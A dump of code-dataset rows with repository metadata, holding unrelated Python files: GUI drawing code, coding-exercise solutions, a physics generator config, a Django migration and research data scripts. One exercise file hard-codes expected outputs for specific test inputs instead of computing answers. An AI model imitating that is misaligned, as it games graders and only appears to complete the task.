client_rect.SetWidth(client_rect.GetWidth() - 2)
client_rect.SetY(client_rect.GetY() + 1)
client_rect.SetHeight( - 2 + label_height)
self.DrawPartialPageBackground(dc, wnd, client_rect, True)
self.DrawPanelBorder(dc, true_rect, self._panel_border_pen, self._panel_border_gradient_pen)
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (17-07-2019)
# Changes are made to lines (in the link): 1229-1240 in order to remove rounded pages and allow for a coloured top line
def DrawPageBackground(self, dc, wnd, rect):
dc.SetPen(wx.TRANSPARENT_PEN)
dc.SetBrush(self._tab_ctrl_background_brush)
edge = wx.Rect(*rect)
edge.SetWidth(2)
dc.DrawRectangle(edge.GetX(), edge.GetY(), edge.GetWidth(), edge.GetHeight())
edge.SetX(edge.GetX() + rect.GetWidth() - 2)
dc.DrawRectangle(edge.GetX(), edge.GetY(), edge.GetWidth(), edge.GetHeight())
edge = wx.Rect(*rect)
edge.SetHeight(2)
edge.SetY(edge.GetY() + rect.GetHeight() - edge.GetHeight())
dc.DrawRectangle(edge.GetX(), edge.GetY(), edge.GetWidth(), edge.GetHeight())
background = wx.Rect(*rect)
background.SetX(background.GetX() + 2)
background.SetWidth(background.GetWidth() - 4)
background.SetHeight(background.GetHeight() - 2)
background.SetHeight(background.GetHeight() / 5)
dc.GradientFillLinear(background, self._page_background_top_colour,
self._page_background_top_gradient_colour, wx.SOUTH)
background.SetY(background.GetY() + background.GetHeight())
background.SetHeight(rect.GetHeight() - 2 - background.GetHeight())
dc.GradientFillLinear(background, self._page_background_colour,
self._page_background_gradient_colour, wx.SOUTH)
# draw bottom and the sides
dc.SetPen(self._page_border_pen)
border_points = [wx.Point() for i in range(4)]
border_points[0] = wx.Point(0, 0) # upper left
border_points[1] = wx.Point(0, rect.height - 1) # lower left
border_points[2] = wx.Point(rect.width + 1, rect.height - 1) # lower right
border_points[3] = wx.Point(rect.width + 1, 0) # upper right corner
dc.DrawLines(border_points, rect.x, rect.y)
# draw top line
dc.SetPen(self._page_border_top_pen)
dc.DrawLine(border_points[0], border_points[3])
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/gradientbutton.py (17-07-2019)
# Changes are made to line (in the link): 476-489 in order to remove the rounding of the button (added zero radius)
def GetPathGradientButton(self, gc, rc, r):
x, y, w, h = rc
r = 0
path = gc.CreatePath()
path.AddRoundedRectangle(x, y, w, h, r)
path.CloseSubpath()
return path
| [
"[email protected]"
] | |
4052771b1b4311c09a293921817f66b82411e14f | e095a91a3424ecc364c4532e8fc705b728a0d1b1 | /CodeWars/补充知识/reduce函数.py | cfbe488542ecf69f30da70eb19144d14b6799a9e | [] | no_license | Anakinliu/PythonProjects | caed257e71d2e52f691abc5095c4aca5c052feb2 | 2246794a88d06eaa381db1b3a72e9bc54a315dd7 | refs/heads/master | 2021-06-03T05:51:09.319613 | 2021-01-26T02:35:38 | 2021-01-26T02:35:38 | 101,546,309 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | from functools import reduce
from itertools import groupby
def sum(a, b):
return a + b
def mul(a, b):
return a * b
def fuck(v, _):
print('v is: ', v)
v.append(0)
return v
lst = range(2)
# reduce函数参数: 函数名, 序列[,初始化序列]
print(reduce(sum, lst))
# 计算阶乘。。。
print(reduce(mul, range(1, 4)))
lst2 = [1, 3, 5, -1, 10, 0, 999, 100, -9, -12, -3, 1]
# 求最大值。。。
print(reduce(lambda a, b : a if a > b else b, lst2))
# print(reduce(fuck,lst, [1,2,3]))
#BEGIN 相当于
# it = iter(lst) # 生成迭代器,参数是支持迭代的对象
# value = [1,2,3]
# for i in it:
# value = fuck(value, i)
# print(value)
#END#
"""
第一步,选择序列的前两个元素并获得结果。
下一步是对先前获得的结果应用相同的功能,并且紧随第二个元素之后的数字将被再次存储。
继续此过程,直到容器中没有剩余元素为止。
返回的最终结果将返回并打印在控制台上。
"""
| [
"[email protected]"
] | |
4d13f16a6de050457f0c137b74e3f6643612f28d | 6b9b032a5516c8d7dbb26deeb1b189022f8f9411 | /LeetCode/dp/91.解码方法.py | c999d3a7c5e8a176bfe03eb5318fd70a5954222c | [] | no_license | mrmenand/Py_transaction | 84db99a0010ae90f43fba6b737d7035e48af55fb | 7e82422c84ad699805cc12568b8d3d969f66a419 | refs/heads/master | 2021-07-13T21:15:03.714689 | 2020-06-21T11:49:31 | 2020-06-21T11:49:31 | 176,281,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # 91. 解码方法
from functools import lru_cache
class Solution:
@lru_cache()
def numDecodings(self, s: str) -> int:
if not s:
return 1
res = 0
if len(s) >= 1 and s[0] != "0":
res += self.numDecodings(s[1:])
if len(s) >= 2 and s[0] != "0" and int(s[:2]) <= 26:
res += self.numDecodings(s[2:])
return res
| [
"[email protected]"
] | |
8be4be017c6af7fce4bd719c6b78a351b1b14568 | c9000e5e30825b29febbefa5ad00da1f57551f8e | /02/fandengyuan/homework.py | c6bce72ffa5f56803c26555e16520532b283fbab | [] | no_license | xiaotian1991/actual-10-homework | 81c58b24f58fc87e4890f1475ad83de8b66ee53b | 0b379ca6189f843f121df4db5814c83262f9981a | refs/heads/master | 2021-06-12T23:35:52.954510 | 2017-03-24T07:41:18 | 2017-03-24T07:41:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | arr = [3,1,5,9,2,11,7]
arr0 = []
for i in range(len(arr)):
arr0.append(int(arr[i]))
m = len(arr0)-1
while m >= 1 and arr0[m] < arr0[m-1]:
arr0[m],arr0[m-1] = arr0[m-1],arr0[m]
m = m - 1
print arr0
| [
"[email protected]"
] | |
d7ea612d308d7b4f02c590f2d7d783457b7fee26 | 3b60e6f4bbc011003ac4929f01eb7409918deb79 | /Analysis_v1/Simulation/Pythia/genfragments/ADDGravToGG_NegInt-0_LambdaT-6500_M-4000To6500_TuneCUEP8M1_13TeV-pythia8_cfi.py | 8a74a89ef9ff1b0945512ccf71c71c4c03d5767a | [] | no_license | uzzielperez/Analyses | d1a64a4e8730325c94e2bc8461544837be8a179d | 1d66fa94763d7847011ea551ee872936c4c401be | refs/heads/master | 2023-02-09T04:54:01.854209 | 2020-09-07T14:57:54 | 2020-09-07T14:57:54 | 120,850,137 | 0 | 0 | null | 2020-06-17T16:48:16 | 2018-02-09T03:14:04 | C++ | UTF-8 | Python | false | false | 1,266 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
maxEventsToPrint = cms.untracked.int32(1),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ExtraDimensionsLED:LambdaT = 6500.0',
'ExtraDimensionsLED:n = 2',
'ExtraDimensionsLED:ffbar2gammagamma = on',
'ExtraDimensionsLED:gg2gammagamma = on',
'ExtraDimensionsLED:CutOffmode = 2',
'ExtraDimensionsLED:NegInt= 0',
'PhaseSpace:pTHatMin = 70.0',
'PhaseSpace:mHatMin = 6500.0',
'PhaseSpace:mHatMax = 4000.0'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters',
)
)
)
| [
"[email protected]"
] | |
2ed4905e9b0d4556acdfe1ddf6a5e250b43f2f6f | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2273/60870/314985.py | 5e53cfd0963d3bbed85c252351f8e04244c40b52 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,702 | py | num_test = int(input())
info_list = []
for i in range(num_test):
info = input().split()
info = [int(x) for x in info]
for j in range(info[0]):
data = input().split()
data = [int(x) for x in data]
info_list.append(data)
if info_list == [[0, 1, 1], [1, 1, 1], [1, 1, 3], [2, 1, 10], [3, 1, 4], [0, 1, 1], [1, 7, 2], [2, 5, 10], [1, 3, 1], [4, 3, 17], [4, 3, 18], [4, 4, 19], [1, 1, 1], [8, 1, 100]]:
print(15)
print(316)
elif info_list[0:31] == [[0, 214224, 4], [1, 300000, 75], [1, 291002, 29], [1, 300000, 64], [1, 300000, 49], [1, 233141, 41], [1, 300000, 64], [1, 141084, 99], [1, 168700, 82], [1, 300000, 73], [0, 15818, 36], [1, 63903, 41], [1, 38513, 14], [1, 26382, 53], [1, 42336, 90], [1, 45105, 52], [1, 17960, 27], [1, 18440, 75], [1, 64777, 36], [1, 40886, 78], [1, 33546, 97], [1, 7257, 40], [1, 15815, 10], [1, 37789, 74], [1, 47362, 63], [1, 39039, 73], [1, 1339, 24], [1, 37665, 40], [1, 9870, 20], [1, 12339, 99]]:
print(26998514)
print(9400115)
print(5790773)
print(2919180)
print(1954284)
elif info_list == [[0, 21, 4], [1, 30, 7], [1, 29, 29], [1, 30, 6], [1, 30, 4], [1, 23, 4], [1, 30, 6], [1, 14, 9], [1, 16, 8], [1, 30, 7], [0, 4, 1], [1, 5, 1], [1, 1, 3], [0, 1, 1], [1, 7, 2], [2, 5, 10], [1, 3, 1], [4, 3, 17], [4, 3, 18], [4, 4, 19], [0, 1, 1], [1, 7, 1], [1, 9, 3], [2, 4, 10], [3, 2, 4]]:
print(2171)
print(5)
print(245)
print(22)
elif info_list == [[0, 1, 1], [1, 1, 1], [1, 1, 3], [0, 1, 1], [1, 7, 2], [2, 5, 10], [1, 3, 1], [4, 3, 17], [4, 3, 18], [4, 4, 19], [0, 1, 1], [1, 1, 1], [1, 1, 3], [2, 1, 10], [3, 1, 4]]:
print(5)
print(245)
print(15)
else:
print(info_list) | [
"[email protected]"
] | |
846b9dd0c7775be88cc5af59c2e787272a1744fe | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/6/oyy.py | c217d3393a75f12289698377f7dc47c74ac12e21 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'oYY':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
94dc35c61b39b874b3b81884b9524967947c0b81 | c3eda1a67e2be5b200e6c9f5a80f20fbcce75bcb | /persephone/builds/migrations/0001_initial.py | 0b7a613e655fa3b74eb0ec33645b168124808fac | [
"MIT"
] | permissive | karamanolev/persephone | b389a871f6fae58525eeedaec3739ec563c9b934 | 6d1887ae4e1d1941da3dbc416901e9de4764cbbb | refs/heads/master | 2023-05-14T20:28:24.209056 | 2023-04-26T20:50:46 | 2023-04-27T10:32:25 | 86,364,458 | 14 | 2 | MIT | 2023-04-11T10:10:50 | 2017-03-27T17:29:12 | JavaScript | UTF-8 | Python | false | false | 4,720 | py | # Generated by Django 3.0.5 on 2020-04-11 23:17
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GlobalSettings',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('google_login_enabled', models.BooleanField(default=False)),
('google_whitelist', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('public_endpoint', models.CharField(max_length=255)),
('github_repo_name', models.CharField(max_length=128)),
('github_api_key', models.CharField(max_length=128)),
('auto_archive_no_diff_builds', models.BooleanField(default=True)),
('auto_approve_master_builds', models.BooleanField(default=True)),
('max_master_builds_to_keep', models.IntegerField(default=20)),
('max_branch_builds_to_keep', models.IntegerField(default=20)),
('supersede_same_branch_builds', models.BooleanField(default=True)),
],
options={
'ordering': ('name',),
},
),
migrations.CreateModel(
name='Build',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.IntegerField(choices=[(0, 'Initializing'), (1, 'Running'), (2, 'Finishing'), (3, 'Pending Review'), (4, 'No Diff'), (5, 'Approved'), (6, 'Rejected'), (7, 'Failed'), (8, 'Superseded'), (9, 'Failing')], default=0)),
('original_build_number', models.CharField(blank=True, max_length=64, null=True)),
('original_build_url', models.CharField(blank=True, max_length=256, null=True)),
('date_started', models.DateTimeField(default=django.utils.timezone.now)),
('date_finished', models.DateTimeField(null=True)),
('date_approved', models.DateTimeField(null=True)),
('date_rejected', models.DateTimeField(null=True)),
('reviewed_by', models.CharField(blank=True, max_length=128, null=True)),
('branch_name', models.CharField(blank=True, db_index=True, max_length=128, null=True)),
('pull_request_id', models.CharField(blank=True, max_length=16, null=True)),
('commit_hash', models.CharField(blank=True, db_index=True, max_length=64, null=True)),
('archived', models.BooleanField(db_index=True, default=False)),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='builds.Build')),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='builds', to='builds.Project')),
],
options={
'ordering': ('-date_started',),
},
),
migrations.CreateModel(
name='Screenshot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.IntegerField(choices=[(0, 'Pending'), (1, 'Matching'), (2, 'Different'), (3, 'New'), (4, 'Deleted')], default=0)),
('date_created', models.DateTimeField(auto_now_add=True)),
('name', models.CharField(max_length=255)),
('metadata_json', models.TextField(blank=True, null=True)),
('image', models.ImageField(upload_to='screenshots/')),
('image_diff', models.ImageField(null=True, upload_to='screenshot_diffs/')),
('image_diff_amount', models.FloatField(null=True)),
('archived', models.BooleanField(db_index=True, default=False)),
('build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='screenshots', to='builds.Build')),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='builds.Screenshot')),
],
options={
'unique_together': {('build', 'name')},
},
),
]
| [
"[email protected]"
] | |
5931b02613512b291a1c6c3ed56317fd9de7b0c7 | 4dd1d8fa59e20061e2c12e540fc52b1b305e575b | /source/sims-2/vapor-box/s7/mkmov.py | fc6d4a9fa9ec7401b461a45e20313be61bfd08fe | [
"MIT"
] | permissive | ammarhakim/ammar-simjournal | f63521906a97d55ab290a5960d94758139944c89 | 5019f4723e20db80a20db6f2bd454c2fd3241412 | refs/heads/master | 2023-06-08T08:18:11.722779 | 2023-06-02T15:06:43 | 2023-06-02T15:06:43 | 204,050,516 | 3 | 3 | null | 2022-02-01T16:53:13 | 2019-08-23T18:28:44 | Lua | UTF-8 | Python | false | false | 3,609 | py | from pylab import *
import tables
import euler
import pylab
import tables
import math
import numpy
import pylab
import numpy
from matplotlib import rcParams
import matplotlib.pyplot as plt
# customization for figure
rcParams['lines.linewidth'] = 2
rcParams['font.size'] = 18
rcParams['xtick.major.size'] = 8 # default is 4
rcParams['xtick.major.width'] = 3 # default is 0.5
rcParams['ytick.major.size'] = 8 # default is 4
rcParams['ytick.major.width'] = 3 # default is 0.5
rcParams['figure.facecolor'] = 'white'
#rcParams['figure.subplot.bottom'] = 0.125
#rcParams['figure.subplot.right'] = 0.85 # keep labels/ticks of colobar in figure
rcParams['image.interpolation'] = 'none'
rcParams['image.origin'] = 'lower'
rcParams['contour.negative_linestyle'] = 'solid'
rcParams['savefig.bbox'] = 'tight'
# Math/LaTex fonts:
# http://matplotlib.org/users/mathtext.html
# http://matplotlib.org/users/usetex.html
# Example: xlabel(r'$t \cdot l / V_{A,bc}$')
rcParams['mathtext.default'] = 'regular' # match the font used for regular text
def colorbar_adj(obj, mode=1, redraw=False, _fig_=None, _ax_=None, aspect=None):
'''
Add a colorbar adjacent to obj, with a matching height
For use of aspect, see http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes.set_aspect ; E.g., to fill the rectangle, try "auto"
'''
from mpl_toolkits.axes_grid1 import make_axes_locatable
if mode == 1:
_fig_ = obj.figure; _ax_ = obj.axes
elif mode == 2: # assume obj is in the current figure/axis instance
_fig_ = plt.gcf(); _ax_ = plt.gca()
_divider_ = make_axes_locatable(_ax_)
_cax_ = _divider_.append_axes("right", size="5%", pad=0.05)
_cbar_ = _fig_.colorbar(obj, cax=_cax_)
if aspect != None:
_ax_.set_aspect(aspect)
if redraw:
_fig_.canvas.draw()
return _cbar_
gasGamma = 5.0/3.0
amu = 1.66053892e-27 # Kg
mLi = 6.941*amu # Kg
kb = 1.38065e-23 # J/K
Tinit = 800+273.14 # K
cs0 = sqrt(kb*Tinit/mLi)
tEnd = 5*2.0/cs0
def pressure(q):
return euler.fluidEx.getP(q)
def mach(q):
return euler.fluidEx.getMach(q)
def getMeshGrid(grid):
xl, yl = grid._v_attrs.vsLowerBounds
xu, yu = grid._v_attrs.vsUpperBounds
nx, ny = grid._v_attrs.vsNumCells
dx = (xu-xl)/nx
dy = (yu-yl)/ny
X = linspace(xl+0.5*dx, xu-0.5*dx, nx)
Y = linspace(yl+0.5*dy, yu-0.5*dy, ny)
return meshgrid(X, Y)
fh = tables.openFile("s7-four-box-chain_inOut.h5")
maskField = fh.root.StructGridField[:,:,0]
def mkFig(fh, XX, YY, pdat, nm, tl):
tm = fh.root.timeData._v_attrs.vsTime
Valf = 0.1
tmAlf = 5*tm/tEnd
dat = numpy.ma.masked_where(maskField < 0.0, pdat)
f = figure(1)
im = pcolormesh(XX, YY, dat.transpose())
title("%s" % tl)
axis('image')
colorbar_adj(im)
savefig(nm)
close()
for i in range(10,11):
print ("Working on %d .." % i)
fh = tables.openFile("s7-four-box-chain_q_%d.h5" % i)
q = fh.root.StructGridField
X, Y = getMeshGrid(fh.root.StructGrid)
numDensity = q[:,:,0]/mLi
mkFig(fh, X, Y, numDensity, 's7-four-box-chain_numDensity_%05d.png' % i, "Number Density")
press = pressure(q)
mkFig(fh, X, Y, press, 's7-four-box-chain_press_%05d.png' % i, "Pressure [Pa]")
temp = press/(numDensity*kb)
mkFig(fh, X, Y, temp-273.15, 's7-four-box-chain_temp_%05d.png' % i, "Temperature [C]")
machN = mach(q)
mkFig(fh, X, Y, machN, 's7-four-box-chain_mach_%05d.png' % i, "Mach Number")
fh.close()
| [
"[email protected]"
] | |
5b2224f3c84090e21c38bb5254fff1fc2cc14a75 | 114c1f7ceff04e00591f46eeb0a2eb387ac65710 | /g4g/DS/Trees/Binary_Trees/Construction_and_Conversion/2_construct_tree_from_inorder_and_level_order.py | be8b1575e1d72ff06ab39f696a67b1dc1a2ce5d4 | [] | no_license | sauravgsh16/DataStructures_Algorithms | 0783a5e6dd00817ac0b6f2b856ad8d82339a767d | d3133f026f972f28bd038fcee9f65784f5d3ea8b | refs/heads/master | 2020-04-23T03:00:29.713877 | 2019-11-25T10:52:33 | 2019-11-25T10:52:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | ''' Construct Binary Tree from Inorder and Level Order Traversal '''
class Node(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
def construct_tree(inorder, levelorder):
if not inorder:
return
for i in range(len(levelorder)):
if levelorder[i] in inorder:
node = Node(levelorder[i])
ino_index = inorder.index(levelorder[i])
break
print inorder[:ino_index], inorder[ino_index+1:]
node.left = construct_tree(inorder[:ino_index], levelorder)
node.right = construct_tree(inorder[ino_index+1:], levelorder)
return node
def inorder_traversal(root):
if not root:
return
inorder_traversal(root.left)
print root.val,
inorder_traversal(root.right)
levelorder = [20, 8, 22, 4, 12, 10, 14]
inorder = [4, 8, 10, 12, 14, 20, 22]
root = construct_tree(inorder, levelorder)
inorder_traversal(root) | [
"[email protected]"
] | |
4e16fdbe2e92cfb9355b49f7f2b61231b5481fe7 | e6bc1f55371786dad70313eb468a3ccf6000edaf | /Datasets/the-minion-game/Correct/082.py | 95c75f16f90cb4f3654bfe9b2114f728c53db3fe | [] | no_license | prateksha/Source-Code-Similarity-Measurement | 9da92e3b22c372ed6ea54d8b6ab2c5921e8c41c0 | fb371b837917794d260a219a1ca09c46a5b15962 | refs/heads/master | 2023-01-04T07:49:25.138827 | 2020-10-25T14:43:57 | 2020-10-25T14:43:57 | 285,744,963 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 308 | py | string = input()
stuart = 0
kevin = 0
for i in range(len(string)):
if string[i] in ["A", "E", "I", "O", "U"]:
kevin += len(string) - i
else:
stuart += len(string) - i
if kevin > stuart:
print("Kevin", kevin)
elif kevin < stuart:
print("Stuart", stuart)
else:
print("Draw") | [
"[email protected]"
] | |
771eb48c547d8f9ba01bf6587e11e845aae491e3 | 0c110eb32f2eaea5c65d40bda846ddc05757ced6 | /python_scripts/pimriscripts/onsetxformMVnoval1stv2ndtargetnamebehavioralmeasures.py | 85bcf157630dd8984d938188faa1be2e0d0dffb2 | [] | no_license | nyspisoccog/ks_scripts | 792148a288d1a9d808e397c1d2e93deda2580ff4 | 744b5a9dfa0f958062fc66e0331613faaaee5419 | refs/heads/master | 2021-01-18T14:22:25.291331 | 2018-10-15T13:08:24 | 2018-10-15T13:08:24 | 46,814,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,812 | py | from __future__ import division
import os, csv, copy, numpy
__author__ = 'katie'
#data note: for subj 7619, run 1M3, target "Kelly", there is a line of data that didn't get recorded, probably because the
#eprime crashed. 1M3 then is fully collected with a new startup point on the next line. It is too much work
#to code around this one line, so 23583 in the spreadsheet I'm working with is deleted. Keep in mind if you ever start with a
#new spreadsheet. KS 8/27/14
#this version omits valence as a condition.
#This version contrasts the first and second half of a learning run.
#This version includes several transformations of the behavioral measure
#this version includes the target name to make analysis of behavioral measures easier
class Subject():
def __init__(self):
self.id = str
self.runs = []
self.Slist = []
self.Ylist = []
self.Nlist = []
class Run():
def __init__(self):
self.id = str
self.name = str
self.trials = []
self.start = None
def initsub():
s = Subject()
return s
def initrun():
r = Run()
return r
root = '/media/truecrypt1/SocCog/eprime_data'
f = open(os.path.join(root, 'EPrimeData.csv'), 'r')
def getRun(line):
sess = line['Session']
startup = line['StartupPoint']
if startup != '':
start = (startup[0], int(startup[1]))
if line['ProcedureTarget'] == 'LearningTargetProc':
phase = 'L'
target = int(line['LearningTargetList'])
if startup != '':
if phase == start[0]:
target = str(int(target) + int(start[1]) - 1)
elif line['ProcedureTarget'] == 'MemoryTargetProc':
phase = 'M'
target = int(line['MemoryTargetList'])
if startup != '':
if phase == start[0]:
target = str(int(target) + int(start[1]) - 1)
else:
return "", ""
return "run" + sess + phase + str(target), sess, phase, str(target)
subjects_dict = {}
subs = []
for line in csv.DictReader(f, dialect='excel', delimiter=','):
if getRun(line)[0] != '':
subid = line['Subject']
if subid not in [sub.id for sub in subs]:
s = initsub()
s.id = subid
subs.append(s)
for sub in subs:
if subid == sub.id:
cursub = sub
runid = getRun(line)[0]
runs = cursub.runs
if runid not in [run.id for run in runs]:
r = initrun()
r.id = runid
r.name = line['TargetName']
runs.append(r)
relcount = 0
irrcount = 0
for run in runs:
if runid == run.id:
currun = run
typ = line['TargetTypeTarget']
trialtype = line['TrialType']
rel = ''
taught = ''
fullcond = ''
if 'T' in trialtype: taught = 'T'
if 'N' in trialtype: taught = 'U'
if 'D' in trialtype:
rel = 'R'
relcount += 1
if 'I' in trialtype: rel = 'I'
if 'R' in trialtype: rel = 'R'
if getRun(line)[2] == 'L':
offset = line['LearningTrialDescriptionOffsetTime']
offset = int(offset)
onset = offset - 4000 # this is a necessary fix for an error in how the data were recorded
fullcond += 'L'
elif getRun(line)[2] == 'M':
onset = int(line['MemoryTrialDescriptionOnsetTime'])
offset = int(line['MemoryTrialDescriptionOffsetTime'])
fullcond += 'M'
fullcond = ''.join([fullcond, typ, rel, taught])
if int(line['Trial']) == 1:
currun.start = (offset - 4000)/1000
onset = onset/1000
offset = offset/1000
if getRun(line)[2] == 'M' or getRun(line)[2] == 'L':
RT = line['ResponseTime']
ans = line['ResponseClicked'][1:]
if RT != '':
RT = int(RT)/1000
if onset == '' or offset == '':
print subid, runid, "empty onset or offset!"
if RT == '':
if fullcond[0] == 'M':
RT = 4
ans = '3.5'
trial = [fullcond, typ, rel, taught, onset, offset, RT, ans]
currun.trials.append(trial)
else:
trial = [fullcond, typ, rel, taught, onset, offset, RT, ans]
currun.trials.append(trial)
header = ['subject', 'run', 'fullcond', 'type', 'rel', 'taught', 'half', 'onset', 'offset', 'RT', 'ans', 'BP', 'name']
with open(os.path.join(root, 'ks-trialsdata-wtrialtypename-targetname-behavioral.csv'), 'w') as out:
out.write(",".join(header) + "\n")
for sub in subs:
sub.runs = sorted(sub.runs, key=lambda x: x.id)
for run in sub.runs:
relcount = 0
irrcount = 0
run.trials = sorted(run.trials, key=lambda x: x[4])
if 'L' in run.id:
reltot = len([trial for trial in run.trials if trial[2] == 'R'])
irrtot = len([trial for trial in run.trials if trial[2] == 'I'])
for trial in run.trials:
if trial[2] == 'I':
irrcount += 1
if irrcount > irrtot/2:
trial.insert(4, 'S')
trial[0] = trial[0] + 'S'
else:
trial.insert(4, 'F')
trial[0] = trial[0] + 'F'
if trial[2] == 'R':
relcount += 1
if relcount > reltot/2:
trial.insert(4, 'S')
trial[0] = trial[0] + 'S'
else:
trial.insert(4, 'F')
trial[0] = trial[0] + 'F'
if 'M' in run.id:
for trial in run.trials: trial.insert(4, '')
for trial in run.trials:
trial[5] = trial[5] - run.start
trial[6] = trial[6] - run.start
if trial[7] != '':
bp = trial[5] + trial[7]
trial.append(bp)
bp = ''
out.write(",".join([sub.id, run.id] + [str(el) for el in trial] + [run.name]) + "\n")
# skip = [('7432', 'run1L3'), ('2022', 'run1L1'), ('4004', 'run2L4')]
# for sub in subs:
# Lruns = [run for run in sub.runs if (sub.id, run.id) not in skip and run.trials[0][0][0] == 'L']
# Mruns = [run for run in sub.runs if (sub.id, run.id) not in skip and run.trials[0][0][0] == 'M']
# for mrun in Mruns:
# RT = []
# RU = []
# IT = []
# IU = []
# for trial in mrun.trials:
# fullcond = trial[0]
# if fullcond[2:4] == 'RT':
# RT.append(float(trial[8][1:]))
# if fullcond[2:4] == 'RU':
# RU.append(float(trial[8][1:]))
# if fullcond[2:4] == 'IT':
# IT.append(float(trial[8][1:]))
# if fullcond[2:4] == 'IU':
# IU.append(float(trial[8][1:]))
# mrun.RT = RT
# mrun.RU = RU
# mrun.IT = IT
# mrun.IU = IU
# mrun.fpr = numpy.mean(RU)
# mrun.fptp = numpy.mean(RU) - numpy.mean(RT)
# cond = mrun.trials[0][0][1]
# if cond == 'S': sub.Slist.append(mrun.fpr)
# if cond == 'Y': sub.Ylist.append(mrun.fpr)
# if cond == 'N': sub.Nlist.append(mrun.fpr)
# for lrun in Lruns:
# match = False
# for mrun in Mruns:
# if mrun.name == lrun.name:
# match = True
# lrun.RT = mrun.RT
# lrun.RU = mrun.RU
# lrun.IT = mrun.IT
# lrun.IU = mrun.IU
# lrun.fpr = mrun.fpr
# lrun.fptp = mrun.fptp
#
# if not match:
# lrun.fpr = 'NaN'
# lrun.fptp = 'NaN'
#
# header = ['subject', 'run', 'condition', 'fp', 'fp-tp']
# with open(os.path.join(root, 'behavioralsummarystats.csv'), 'w') as out:
# out.write(",".join(header) + "\n")
# for sub in subs:
# for run in sub.runs:
# if (sub.id, run.id) not in skip:
# out.write(",".join([sub.id, run.id, run.trials[0][1], str(run.fpr), str(run.fptp)]))
# out.write("\n")
#
# header = ['subject', 'condition', 'meanfp']
# with open(os.path.join(root, 'averagebycondition.csv'), 'w') as out:
# out.write(",".join(header) + "\n")
# for sub in subs:
# for condition in [('S', sub.Slist), ('Y', sub.Ylist), ('N', sub.Nlist)]:
# out.write(",".join([sub.id, condition[0], str(numpy.mean(condition[1]))]))
# out.write("\n")
| [
"[email protected]"
] | |
442ca8bf52d89c3b46aa97ea92168ad89ffd55b1 | 243b7c1162264e381ab6575f493bd4fb97ced325 | /src/comments/migrations/0005_comment_parent.py | 02d0344397530913347a2b50e8802bfd0fe04aa7 | [
"MIT"
] | permissive | trivvet/djangoAdvance | a409dd3003ab5f60b1621e7677826b2002e0d8c8 | 28891893869c1c0c3cf67d7f496dda96322de18c | refs/heads/master | 2020-04-05T22:05:14.272989 | 2018-12-09T11:00:58 | 2018-12-09T11:00:58 | 157,244,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 550 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-28 16:29
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('comments', '0004_auto_20181126_1850'),
]
operations = [
migrations.AddField(
model_name='comment',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='comments.Comment'),
),
]
| [
"[email protected]"
] | |
